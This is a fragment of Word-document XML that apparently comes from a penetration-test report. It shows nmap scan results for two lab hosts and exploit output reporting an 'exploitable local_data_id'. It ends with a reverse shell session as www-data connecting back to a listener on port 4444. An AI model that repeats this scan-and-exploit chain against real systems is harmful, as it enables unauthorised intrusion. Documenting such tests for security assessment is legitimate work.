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11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Thu Jul 11 10:36:53 2024 as: nmap -sV -sC -Pn --script http-title -iL targets.txt -oN nmap_results.txt</w:t>
        <w:br/>
        <w:t>Nmap scan report for 10.33.102.225</w:t>
        <w:br/>
        <w:t>Host is up (0.00012s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MAC Address: 00:50:56:97:49:B5 (VMware)</w:t>
        <w:br/>
        <w:t>Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel</w:t>
        <w:br/>
        <w:br/>
        <w:t>Nmap scan report for 10.33.102.226</w:t>
        <w:br/>
        <w:t>Host is up (0.00013s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MAC Address: 00:50:56:97:D8:D2 (VMware)</w:t>
        <w:br/>
        <w:t>Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel</w:t>
        <w:br/>
        <w:br/>
        <w:t>Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .</w:t>
        <w:br/>
        <w:t># Nmap done at Thu Jul 11 10:37:01 2024 -- 2 IP addresses (2 hosts up) scanned in 7.99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10.33.102.225:40740) at 2024-07-11 10:38:02 +0700</w:t>
        <w:br/>
        <w:t>[+] Found exploitable local_data_id 15 for host_id 1</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  www-data @ 172.24.0.3  10.33.102.224:4444 -&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">            x                                             10.33.102.225:40740</w:t>
        <w:br/>
        <w:t xml:space="preserve">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